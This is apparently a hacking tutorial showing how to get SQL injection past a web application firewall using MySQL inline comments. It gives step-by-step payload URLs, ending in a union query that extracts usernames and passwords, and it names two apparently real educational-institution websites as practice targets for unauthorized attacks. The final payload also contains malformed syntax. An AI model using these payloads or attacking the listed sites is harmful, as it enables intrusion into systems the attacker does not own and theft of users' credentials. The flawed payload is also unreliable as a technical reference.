SQL Injection With WAF Bypassing

After Reading My tutorial about Basic SQL Injection I think you have tried to inject some sitesand you may be getting the error like below

This is due to Web Application Firewall or else called WAF.It Blocks our sql query so we cant inject as we did earlier we have to add some thing to bypass this WAF shit.It is simple to bypass WAF by using Commenting Method.You can use /*!50000/ like commenting tricks.Here I will show you how I bypass WAF using inline comments.

www.website.com/index.php?id=1 order by 3–   No error

www.website.com/index.php?id=1 order by 4–  error

www.website.com/index.php?id=-1 union select 1,2,3–  Forbidden

www.website.com/index.php?id=-1 /*!50000union*/ /*!50000select*/ 1,2,3–

VOILA!.Bypassed WAF

 Now We can use comments to bypassing the WAF filter for all our query.Just add /*!queryhere*/ to by pass filter.

  ex:www.website.com/index.php?id=-2′ /*!50000union*/ /*!50000selEct*/ 1,2,/*!50000gRoUp_coNcat(username,0x0a,password,0x0a,AccountStatus,,0x0a,PriorityLevel,0x0a)*/,4,5,6  /*!50000from*/ information_schema.columns /*!50000WHERE*/ table_name=0x79656c6c6f775f6167656e7473–+

          Practice WAF Bypassing here:

          http://www.dias.edu.in/content.php?id=2

         http://mitmoradabad.edu.in/articlesdetails.php?id=2